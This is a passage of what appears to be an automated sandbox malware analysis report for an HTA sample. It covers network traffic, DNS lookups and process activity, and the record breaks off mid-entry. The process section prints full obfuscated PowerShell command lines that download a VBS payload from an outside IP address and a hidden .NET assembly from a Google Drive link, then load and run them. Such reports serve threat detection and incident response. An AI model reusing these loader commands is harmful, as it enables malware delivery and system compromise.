                                    Oct 30, 2024 08:24:10.003119946 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003129005 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003135920 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003140926 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003151894 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003165007 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003184080 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003199100 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003216028 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003232956 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003247976 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003252983 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003263950 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003276110 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003297091 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003304005 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003308058 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003334999 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003350973 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003379107 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003401041 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003787041 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003802061 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003818035 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003849030 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003850937 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003866911 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.003875017 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003897905 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.003916025 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.004095078 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.004113913 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.004128933 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:10.004168987 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:10.004189014 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:14.666866064 CET8049704198.46.178.151192.168.2.5
                                    Oct 30, 2024 08:24:14.670188904 CET4970480192.168.2.5198.46.178.151
                                    Oct 30, 2024 08:24:15.465486050 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:15.465538025 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:15.465614080 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:15.473643064 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:15.473673105 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.359005928 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.359097958 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:16.360586882 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.360687017 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:16.364648104 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:16.364660025 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.365087986 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.377759933 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:16.419356108 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.770157099 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.816282988 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:16.816307068 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.819452047 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:16.819528103 CET44349705142.250.185.206192.168.2.5
                                    Oct 30, 2024 08:24:16.819628954 CET49705443192.168.2.5142.250.185.206
                                    Oct 30, 2024 08:24:21.333878040 CET4970480192.168.2.5198.46.178.151

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 30, 2024 08:24:15.452055931 CET5496753192.168.2.51.1.1.1
                                    Oct 30, 2024 08:24:15.460180044 CET53549671.1.1.1192.168.2.5
                                    Oct 30, 2024 08:24:36.449626923 CET5352980162.159.36.2192.168.2.5
                                    Oct 30, 2024 08:24:37.099587917 CET4997653192.168.2.51.1.1.1
                                    Oct 30, 2024 08:24:37.107438087 CET53499761.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 30, 2024 08:24:15.452055931 CET192.168.2.51.1.1.10xe7a8Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                    Oct 30, 2024 08:24:37.099587917 CET192.168.2.51.1.1.10x9419Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 30, 2024 08:24:15.460180044 CET1.1.1.1192.168.2.50xe7a8No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                    Oct 30, 2024 08:24:37.107438087 CET1.1.1.1192.168.2.50x9419Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • drive.google.com
                                    • 198.46.178.151

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549704198.46.178.151806512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 08:24:08.967236042 CET330OUTGET /66/seemethebestthingswithgreatneedswithgoodformewith.tIF HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: 198.46.178.151
                                    Connection: Keep-Alive
                                    Oct 30, 2024 08:24:09.643013000 CET1236INHTTP/1.1 200 OK
                                    Date: Wed, 30 Oct 2024 07:24:09 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                    Last-Modified: Wed, 30 Oct 2024 04:37:20 GMT
                                    ETag: "22a56-625aa41e97181"
                                    Accept-Ranges: bytes
                                    Content-Length: 141910
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: image/tiff
                                    Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 6e 00 74 00 72 00 6f 00 76 00 69 00 73 00 63 00 61 00 64 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 70 00 65 00 6c 00 6f 00 74 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 [TRUNCATED]
                                    Data Ascii: private function CreateSession(wsman, conStr, optDic, entroviscada) dim pelotaFlags dim conOpt dim pelota dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword pelotaFlags = 0 proxyAccessType =
                                    Oct 30, 2024 08:24:09.643038034 CET212INData Raw: 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41
                                    Data Ascii: 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal =
                                    Oct 30, 2024 08:24:09.643066883 CET1236INData Raw: 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 50 00 61 00 73 00 73
                                    Data Ascii: 0 proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA_
                                    Oct 30, 2024 08:24:09.643177986 CET1236INData Raw: 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 54 00 68 00 65
                                    Data Ascii: id! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if if optD
                                    Oct 30, 2024 08:24:09.643193960 CET1236INData Raw: 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 27 00 2d 00 72 00 65 00 6d 00 6f 00 74 00 65 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e
                                    Data Ascii: valid when used with the '-remote' option" pelotaFlags = pelotaFlags OR wsman.SessionFlagUseSsl end if
                                    Oct 30, 2024 08:24:09.643321037 CET636INData Raw: 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66 00 6f 00 72 00 20 00 27 00 2d
                                    Data Ascii: _USERNAME & "' option is not valid for '-auth:none'" ASSERTBOOL not optDic.ArgumentExists(NPARA_PASSWORD
                                    Oct 30, 2024 08:24:09.643338919 CET1236INData Raw: 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52
                                    Data Ascii: ts(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'" ASSERTBOO
                                    Oct 30, 2024 08:24:09.643356085 CET1236INData Raw: 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74
                                    Data Ascii: ARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:digest'" pelotaFlags = pelotaFlags
                                    Oct 30, 2024 08:24:09.643373013 CET1236INData Raw: 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26
                                    Data Ascii: ic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:negotiate'" pel
                                    Oct 30, 2024 08:24:09.643388033 CET636INData Raw: 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 50 00 41 00 53
                                    Data Ascii: TBOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option is not valid for '-auth:certificat
                                    Oct 30, 2024 08:24:09.648793936 CET1236INData Raw: 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 3d 00 20 00 6f 00 73 00 56 00 69 00 73 00 74 00 61 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 27 00 2d 00 22 00 20 00 26 00 20
                                    Data Ascii: Version >= osVista, "The specified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value." A


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549705142.250.185.2064436004C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-10-30 07:24:16 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                    Host: drive.google.com
                                    Connection: Keep-Alive
                                    2024-10-30 07:24:16 UTC1319INHTTP/1.1 303 See Other
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Wed, 30 Oct 2024 07:24:16 GMT
                                    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                    Strict-Transport-Security: max-age=31536000
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5Ls2F4BZAlBu5IB9EKyY-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Cross-Origin-Opener-Policy: same-origin
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:03:24:01
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\mshta.exe
                                    Wow64 process (32bit):true
                                    Commandline:mshta.exe "C:\Users\user\Desktop\greatthingswithmegood.hta"
                                    Imagebase:0x490000
                                    File size:13'312 bytes
                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:03:24:02
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
                                    Imagebase:0x690000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:03:24:02
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:03:24:03
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
                                    Imagebase:0x690000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:03:24:06
                                    Start date:30/10/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"
                                    Imagebase:0xda0000
                                    File size:2'141'552 bytes
                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:03:24:07
                                    Start date:30/10/2024
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp" "c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP"
                                    Imagebase:0x6f0000
                                    File size:46'832 bytes
                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:03:24:11
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
                                    Imagebase:0xeb0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:03:24:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                    Imagebase:0x690000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:03:24:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:03:24:12
                                    Start date:30/10/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
